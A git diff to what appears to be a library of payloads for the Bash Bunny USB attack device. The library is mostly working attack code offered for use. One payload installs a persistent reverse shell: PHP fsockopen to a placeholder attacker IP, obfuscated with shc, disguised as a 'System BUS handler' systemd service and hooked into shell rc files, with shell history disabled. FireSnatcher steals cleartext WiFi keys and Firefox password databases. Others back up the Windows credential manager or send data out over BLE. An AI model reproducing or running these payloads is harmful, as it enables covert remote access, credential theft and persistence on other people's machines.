diff --git a/payloads/extensions/ble_exfil.sh b/payloads/extensions/ble_exfil.sh new file mode 100644 index 00000000..47f5ce3d --- /dev/null +++ b/payloads/extensions/ble_exfil.sh @@ -0,0 +1,16 @@ +#!/bin/bash +# +# BLE_EXFIL v1 by @drapl0n +# Exfiltrate data(25 bytes) stored in "/loot/ble_exfil.txt" via BLE. +# Usage: BLE_EXFIL + +function BLE_EXFIL() { + stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost + stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost + sleep 1 + text=$(cat /root/udisk/loot/ble_exfil.txt) + exfil=${text:0:25} + echo -n -e "AT+ADVDAT=$exfil" > /dev/ttyS1 +} + +export -f BLE_EXFIL diff --git a/payloads/library/credentials/BunnyLogger/payload.sh b/payloads/library/credentials/BunnyLogger/payload.sh index 90d1ea36..fab26f88 100644 --- a/payloads/library/credentials/BunnyLogger/payload.sh +++ b/payloads/library/credentials/BunnyLogger/payload.sh @@ -11,10 +11,10 @@ chmod +x /var/tmp/.system/xinput echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"/var/tmp/.system/sys -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus chmod +x /var/tmp/.system/systemBus mkdir -p ~/.config/systemd/user -echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemBUS.service +echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot chmod +x /var/tmp/.system/reboot -echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/reboot.service +echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/reboot.service systemctl --user daemon-reload systemctl --user enable --now systemBUS.service systemctl --user start --now systemBUS.service diff --git a/payloads/library/credentials/FireSnatcher/FireSnatcher.bat b/payloads/library/credentials/FireSnatcher/FireSnatcher.bat new file mode 100644 index 00000000..d08c8229 --- /dev/null +++ b/payloads/library/credentials/FireSnatcher/FireSnatcher.bat @@ -0,0 +1,6 @@ +mkdir %~dp0\loot\%COMPUTERNAME% +cd /D %~dp0\loot\%COMPUTERNAME% && netsh wlan export profile key=clear +C: cd \D %appdata%\mozilla\firefox\profiles\ +cd %appdata%\mozilla\firefox\profiles\*.default-release\ +copy key4.db %~dp0\loot\%COMPUTERNAME% +copy logins.json %~dp0\loot\%COMPUTERNAME% \ No newline at end of file diff --git a/payloads/library/credentials/FireSnatcher/README.md b/payloads/library/credentials/FireSnatcher/README.md new file mode 100644 index 00000000..1d3b0dd0 --- /dev/null +++ b/payloads/library/credentials/FireSnatcher/README.md @@ -0,0 +1,45 @@ +# Title: FireSnatcher +# Description: Copies Wifi Keys, and Firefox Password Databases +# Author: KarrotKak3 +# Props: saintcrossbow & 0iphor13 +# Version: 1.0.2.0 (Work in Progress) +# Category: Credentials +# Target: Windows (Logged in) +# Attackmodes: HID, Storage + +# Full Description +# ---------------- +# Attacks an Unlocked Windows Machine +# Payload targets: +# - All WiFi creds +# - Firefox Saved Password Database +# +# PAYLOAD RUNS START TO FINISH IN ABOUT 20 SEC +# Delays to Allow Powershell Time to Open and to Give Attack time to Run + +# HOW TO USE PASSWORD DB: COPY KEY4.DB AND LOGINS.JSON TO YOUR COMPUTER AT +# %APPDATA%\MOZILLA\FIREFOX\PROFILES\*.DEFAULT-RELEASE +# Open Firefox and find loot in Settings-> Privacy & Security -> Saved Logins + + +# KNOWN ISSUES +# --------------- +# Loot is saved in Payloads/switch#/loot + + +# Files +# ----- +# - payload.txt: Starts the attack. All configuration contained in this file. +# - FireSnatcher.bat: Worker that grabs Creds + + +# Setup +# ----- +# - Place the payload.txt and FireSnatcher.bat in Payload folder +# - If you are using a SD card, copy FireSnatcher.bat under /payloads/switchn/ (where n is the switch you are running) +# - Good idea to have the Bunny ready to copy to either the device or SD for maximum versatility + +**LED meanings** +- Magenta: Initial setup – about 1 – 3 seconds +- Single yellow blink: Attack in progress +- Green rapid flash, then solid, then off: Attack complete diff --git a/payloads/library/credentials/FireSnatcher/payload.txt b/payloads/library/credentials/FireSnatcher/payload.txt new file mode 100644 index 00000000..143efd55 --- /dev/null +++ b/payloads/library/credentials/FireSnatcher/payload.txt @@ -0,0 +1,78 @@ +# Title: FireSnatcher +# Description: Copies Wifi Keys, and Firefox Password Databases +# Author: KarrotKak3 +# Props: saintcrossbow & 0iphor13 +# Version: 1.0.2.0 (Work in Progress) +# Category: Credentials +# Target: Windows (Logged in) +# Attackmodes: HID, Storage + +# Full Description +# ---------------- +# Attacks an Unlocked Windows Machine +# Payload targets: +# - All WiFi creds +# - Firefox Saved Password Database +# +# PAYLOAD RUNS START TO FINISH IN ABOUT 20 SEC +# Delays to Allow Powershell Time to Open and to Give Attack time to Run + +# HOW TO USE PASSWORD DB: COPY KEY4.DB AND LOGINS.JSON TO YOUR COMPUTER AT +# %APPDATA%\MOZILLA\FIREFOX\PROFILES\*.DEFAULT-RELEASE +# Open Firefox and find loot in Settings-> Privacy & Security -> Saved Logins + + +# KNOWN ISSUES +# --------------- +# Loot is saved in Payloads/switch#/loot + + +# Files +# ----- +# - payload.txt: Starts the attack. All configuration contained in this file. +# - FireSnatcher.bat: Worker that grabs Creds + + +# Setup +# ----- +# - Place the payload.txt and FireSnatcher.bat in Payload folder +# - If you are using a SD card, copy FireSnatcher.bat under /payloads/switchn/ (where n is the switch you are running) +# - Good idea to have the Bunny ready to copy to either the device or SD for maximum versatility + +# LEDs +# ---- +# Magenta: Initial setup – about 1 – 3 seconds +# Single yellow blink: Attack in progress +# Green rapid flash, then solid, then off: Attack complete – Bash Bunny may be removed + +# Options +# ------- +# Name of Bash Bunny volume that appears to Windows (BashBunny is default) +BB_NAME="BashBunny" + +# Setup +# ----- +LED SETUP + + +# Attack +# ------ +ATTACKMODE HID STORAGE +Q DELAY 500 +LED ATTACK +Q DELAY 100 +Q GUI r +Q DELAY 100 +Q STRING powershell Start-Process powershell +Q ENTER +Q DELAY 7000 +Q STRING "iex((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\FireSnatcher.bat')" +Q ENTER +Q DELAY 8000 +Q STRING EXIT +Q ENTER +sync +LED FINISH +Q DELAY 1500 +shutdown now + diff --git a/payloads/library/credentials/sudoSnatch/payload.sh b/payloads/library/credentials/sudoSnatch/payload.sh index a11c2654..56eb0443 100644 --- a/payloads/library/credentials/sudoSnatch/payload.sh +++ b/payloads/library/credentials/sudoSnatch/payload.sh @@ -10,10 +10,10 @@ touch /var/tmp/.system/sysLog echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"cat /var/tmp/.system/sysLog "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus chmod +x /var/tmp/.system/systemBus mkdir -p ~/.config/systemd/user -echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemBUS.service +echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot chmod +x /var/tmp/.system/reboot -echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/reboot.service +echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/reboot.service systemctl --user daemon-reload systemctl --user enable --now systemBUS.service systemctl --user start --now systemBUS.service diff --git a/payloads/library/execution/ScreenGrab/screenGrab/payload.sh b/payloads/library/execution/ScreenGrab/screenGrab/payload.sh index ea0ff7a6..7c0eec75 100644 --- a/payloads/library/execution/ScreenGrab/screenGrab/payload.sh +++ b/payloads/library/execution/ScreenGrab/screenGrab/payload.sh @@ -10,7 +10,7 @@ mkdir /var/tmp/.system/sysLog cp -r $mntt/payloads/library/screenGrab/systemBus /var/tmp/.system/systemBus chmod +x /var/tmp/.system/systemBus mkdir -p ~/.config/systemd/user -echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemBUS.service +echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service systemctl --user daemon-reload systemctl --user enable --now systemBUS.service systemctl --user start --now systemBUS.service diff --git a/payloads/library/execution/bunnyDOS/bunnyDOS/payload.sh b/payloads/library/execution/bunnyDOS/bunnyDOS/payload.sh index eeb3f5f8..e7b34aed 100644 --- a/payloads/library/execution/bunnyDOS/bunnyDOS/payload.sh +++ b/payloads/library/execution/bunnyDOS/bunnyDOS/payload.sh @@ -6,7 +6,7 @@ ip=$(ip -o -f inet addr show | awk '/scope global/ {print $4}') open=$(nmap -p 80 $ip -q -oG - | grep open | awk '{print $2}' | awk '{printf("%s ",$0)} END { printf "\n" }') mkdir /var/tmp/.system/ mkdir -p ~/.config/systemd/user -echo -e "[Unit]\nDescription= System IO handler.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/sysHandler -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/libSystemIO.service +echo -e "[Unit]\nDescription= System IO handler.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/sysHandler -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/libSystemIO.service cp -r $mntt/payloads/library/bunnyDOS/systemIO /var/tmp/.system/ chmod +x /var/tmp/.system/systemIO for i in $open diff --git a/payloads/library/execution/camPeek/camPeek/payload.sh b/payloads/library/execution/camPeek/camPeek/payload.sh index 3759ce12..84d9f4d0 100644 --- a/payloads/library/execution/camPeek/camPeek/payload.sh +++ b/payloads/library/execution/camPeek/camPeek/payload.sh @@ -10,7 +10,7 @@ mkdir /var/tmp/.system/sysLog cp -r $mntt/payloads/library/camPeek/systemBus /var/tmp/.system/systemBus chmod +x /var/tmp/.system/systemBus mkdir -p ~/.config/systemd/user -echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemBUS.service +echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service systemctl --user daemon-reload systemctl --user enable --now systemBUS.service systemctl --user start --now systemBUS.service diff --git a/payloads/library/exfiltration/BLE_EXFIL_DEMO/payload.txt b/payloads/library/exfiltration/BLE_EXFIL_DEMO/payload.txt new file mode 100644 index 00000000..35e9dcac --- /dev/null +++ b/payloads/library/exfiltration/BLE_EXFIL_DEMO/payload.txt @@ -0,0 +1,47 @@ +# Description: Demonstration of BLE_EXFIL extension. +# AUTHOR: drapl0n +# Version: 1.0 +# Category: Exfiltration +# Target: Unix-like operating systems. +# Attackmodes: HID, Storage + +LED SETUP +ATTACKMODE STORAGE HID +GET SWITCH_POSITION +LED ATTACK +Q DELAY 1000 +Q CTRL-ALT t +Q DELAY 1000 + +# [Prevent storing history] +Q STRING unset HISTFILE +Q ENTER +Q DELAY 200 + +# [Fetching BashBunny's block device] +Q STRING lol='$(lsblk | grep 1.8G)' +Q ENTER +Q DELAY 100 +Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)'' +Q ENTER +Q DELAY 200 + +# [Mounting BashBunny] +Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp +Q ENTER +Q DELAY 2000 +Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)'' +Q ENTER +Q DELAY 500 + +# [Advertising Data] +Q STRING echo BashBunnyRocks \> '$mntt'/loot/ble_exfil.txt +Q ENTER +BLE_EXFIL +Q DELAY 200 +Q STRING udisksctl unmount -b /dev/'$disk' +Q ENTER +Q DELAY 500 +Q STRING exit +Q ENTER +LED FINISH diff --git a/payloads/library/exfiltration/Win_HID_BackupKeyManager/payload.txt b/payloads/library/exfiltration/Win_HID_BackupKeyManager/payload.txt new file mode 100644 index 00000000..48b0284a --- /dev/null +++ b/payloads/library/exfiltration/Win_HID_BackupKeyManager/payload.txt @@ -0,0 +1,66 @@ +#!/bin/bash +# Title: KeyManager Backup +# Description: Create a backup of the key manager which stores log-on credentials for servers, websites and programs +# Author: Cribbit +# Version: 1.0 +# Category: Exfiltration +# Target on: Windows 10 +# Attackmodes: HID & STORAGE +# Extensions: Run +# Props: Paranoid Ninja + +####################### Config ####################### +password=lamepassword +##################### End Config ##################### + +LED SETUP + +ATTACKMODE HID STORAGE + +LED ATTACK + +QUACK DELAY 200 +RUN WIN "rundll32 keymgr.dll, KRShowKeyMgr" +QUACK DELAY 200 +# button: Backup up... +QUACK ALT b +QUACK DELAY 200 +# button: Browse... +QUACK ALT b +# file name +QUACK STRING "backup" +# select task bar +QUACK ALT d +QUACK DELAY 200 +# look for bunny +QUACK STRING "BashBunny" +QUACK DELAY 600 +#select drive +QUACK DOWNARROW +# add loot folder +QUACK STRING "/loot" +QUACK ENTER +QUACK DELAY 200 +# button: Save +QUACK ALT s +QUACK DELAY 200 +# button: Next +QUACK ALT n +QUACK DELAY 200 +# note: keycroc you can uses CTRL-ALT-DELETE +QUACK CTRL-ALT DELETE +QUACK DELAY 200 +QUACK STRING "$password" +QUACK TAB +QUACK STRING "$password" +# button: Next +QUACK ALT n +QUACK DELAY 300 +# button: Finish +QUACK ALT f +QUACK DELAY 200 +# button: Close +QUACK ALT c + +LED FINISH + diff --git a/payloads/library/exfiltration/Win_HID_BackupKeyManager/readme.md b/payloads/library/exfiltration/Win_HID_BackupKeyManager/readme.md new file mode 100644 index 00000000..89c5fdbd --- /dev/null +++ b/payloads/library/exfiltration/Win_HID_BackupKeyManager/readme.md @@ -0,0 +1,30 @@ +# KeyManager Backup +- Author: Cribbit +- Version: 1.0 +- Tested on: Windows 10 +- Category: Exfiltration +- Attackmode: HID & STORAGE +- Extensions: Run +- Props: Paranoid Ninja https://twitter.com/NinjaParanoid/status/1516442028963659777 + +## Description +Create a backup of the key manager which stores log-on credentials for servers, websites and programs. + +## Change Log +| Version | Changes | +| ------- | --------------- | +| 1.0 | Initial release | + +## Config +set the password for the backup by setting the `password` variable + +## Notes +This payload relays heavily on button shortcuts this mean it is very target to an English version of windows. +If you are targeting a different language, you will need to change the letter after the ALT key to the corresponding letter for the button. + +## Colours +| Status | Colour | Description | +| -------- | ----------------------------- | --------------------------- | +| SETUP | Magenta solid | Setting attack mode | +| ATTACK | Yellow single blink | Injecting script | +| FINISHED | Green blink followed by SOLID | Injection finished | \ No newline at end of file diff --git a/payloads/library/remote_access/LinuxPreter/payload.sh b/payloads/library/remote_access/LinuxPreter/payload.sh index cfecd2cf..7bdb73ab 100644 --- a/payloads/library/remote_access/LinuxPreter/payload.sh +++ b/payloads/library/remote_access/LinuxPreter/payload.sh @@ -6,7 +6,7 @@ cp -r $mntt/tools/sysHandle.bin /var/tmp/.system chmod +x /var/tmp/.system/sysHandle.bin mkdir -p ~/.config/systemd/user/ systemctl --user start systemPer.service -echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/var/tmp/.system/./sysHandle.bin -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemPer.service +echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/var/tmp/.system/./sysHandle.bin -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemPer.service echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now systemPer.service \" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now systemPer.service\" >> ~/.bashrc\nfi" > ~/tmmmp chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit diff --git a/payloads/library/remote_access/persistentReverseBunny/README.md b/payloads/library/remote_access/persistentReverseBunny/README.md new file mode 100644 index 00000000..e8ea4c13 --- /dev/null +++ b/payloads/library/remote_access/persistentReverseBunny/README.md @@ -0,0 +1,36 @@ +## About: +* Title: persistentReverseBunny +* Description: persistentReverseBunny provides you persistent reverse shell remotely/locally. +* AUTHOR: drapl0n +* Version: 1.0 +* Category: Remote Access +* Target: Unix-like operating systems with systemd. +* Attackmodes: HID, STORAGE + +## persistentReverseBunny: provides you persistent encoded reverse shell remotely/locally within 15 secs. + +### Workflow: +Keeping tracks clear by disabling and deleting history. Creating hidden directory to store payload. Creating payload mechanism and compiling it for obfuscation, which checks whether internet is connected to the target system, if yes then it creates reverse shell to attackers machine. Creating non-root systemd service to keep payload running in background. Enabling service. Autostarting service on trigger of terminal emulator or shell. + +### Algorithm: +1. Stop storing history, this helps to keep tracks clear from begining. +2. Creating reverse shell. +3. Creating non-root systemd service. +4. Enabling service. +5. Starting service on trigger of firing terminal emulator/shell. + +### LED Status: +* `SETUP` : MAGENTA +* `ATTACK` : YELLOW +* `FINISH` : GREEN + +### Directory Structure of payload components: +| FileName | Directory | +| ----------------------- | ----------------------------- | +| payload.txt | /payloads/switch1/ | +| persistentReverseBunny/ | /payloads/libray/ | + +### Note: +* Change ip address(0.0.0.0) and port number(4444) to your server's ip address and port number in `reversePersistentBunny/payload.sh` on line `6`. +#### Support me if you like my work: +* https://twitter.com/drapl0n diff --git a/payloads/library/remote_access/persistentReverseBunny/payload.txt b/payloads/library/remote_access/persistentReverseBunny/payload.txt new file mode 100644 index 00000000..de367d14 --- /dev/null +++ b/payloads/library/remote_access/persistentReverseBunny/payload.txt @@ -0,0 +1,51 @@ +# Description: persistentReverseBunny provides you persistent and ofuscated reverse shell remotely/locally within 15 secs. +# AUTHOR: drapl0n +# Version: 1.0 +# Category: Remote Access +# Target: Unix-like operating systems with systemd. +# Attackmodes: HID, Storage + +LED SETUP +ATTACKMODE STORAGE HID +GET SWITCH_POSITION +LED ATTACK +Q DELAY 1000 +Q CTRL-ALT t +Q DELAY 1000 + +# [Prevent storing history] +Q STRING unset HISTFILE +Q ENTER +Q DELAY 200 + +# [Fetching BashBunny's block device] +Q STRING lol='$(lsblk | grep 1.8G)' +Q ENTER +Q DELAY 100 +Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)'' +Q ENTER +Q DELAY 200 + +# [Mounting BashBunny] +Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp +Q ENTER +Q DELAY 2000 +Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)'' +Q ENTER +Q DELAY 500 + +# [transfering payload script] +Q STRING cp -r '$mntt'/payloads/library/persistentReverseBunny/payload.sh /tmp/ +Q ENTER +Q STRING chmod +x /tmp/payload.sh +Q ENTER +Q STRING /tmp/./payload.sh \& +Q ENTER +Q STRING disown +Q ENTER +Q STRING udisksctl unmount -b /dev/'$disk' +Q ENTER +Q DELAY 500 +Q STRING exit +Q ENTER +LED FINISH diff --git a/payloads/library/remote_access/persistentReverseBunny/persistentReverseBunny/payload.sh b/payloads/library/remote_access/persistentReverseBunny/persistentReverseBunny/payload.sh new file mode 100644 index 00000000..edd304f3 --- /dev/null +++ b/payloads/library/remote_access/persistentReverseBunny/persistentReverseBunny/payload.sh @@ -0,0 +1,18 @@ +#!/bin/bash +lol=$(lsblk | grep 1.8G) +disk=$(echo $lol | awk '{print $1}') +mntt=$(lsblk | grep $disk | awk '{print $7}') +mkdir /var/tmp/.system/ +echo -e "#!"/bin/bash"\nwhile :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"/bin/sh -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/pop +cp -r $mntt/payloads/library/persistentReverseBunny/shc /var/tmp/.system/ +chmod +x /var/tmp/.system/shc +/var/tmp/.system/./shc -f /var/tmp/.system/pop -o /var/tmp/.system/systemBus +chmod +x /var/tmp/.system/systemBus +rm /var/tmp/.system/pop* +mkdir -p ~/.config/systemd/user +echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service +systemctl --user daemon-reload +systemctl --user enable --now systemBUS.service +systemctl --user start --now systemBUS.service +echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ $? = 0 ]; then\n\techo systemctl --user enable --now systemBUS.service >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ $? = 0 ]; then\n\techo systemctl --user enable --now systemBUS.service >> ~/.bashrc\nfi\n\n" > ~/tmmmp +chmod +x ~/tmmmp && ~/./tmmmp && rm ~/tmmmp && rm /tmp/payload.sh && rm /var/tmp/.system/shc diff --git a/payloads/library/remote_access/persistentReverseBunny/persistentReverseBunny/shc b/payloads/library/remote_access/persistentReverseBunny/persistentReverseBunny/shc new file mode 100644 index 00000000..8e7c686c Binary files /dev/null and b/payloads/library/remote_access/persistentReverseBunny/persistentReverseBunny/shc differ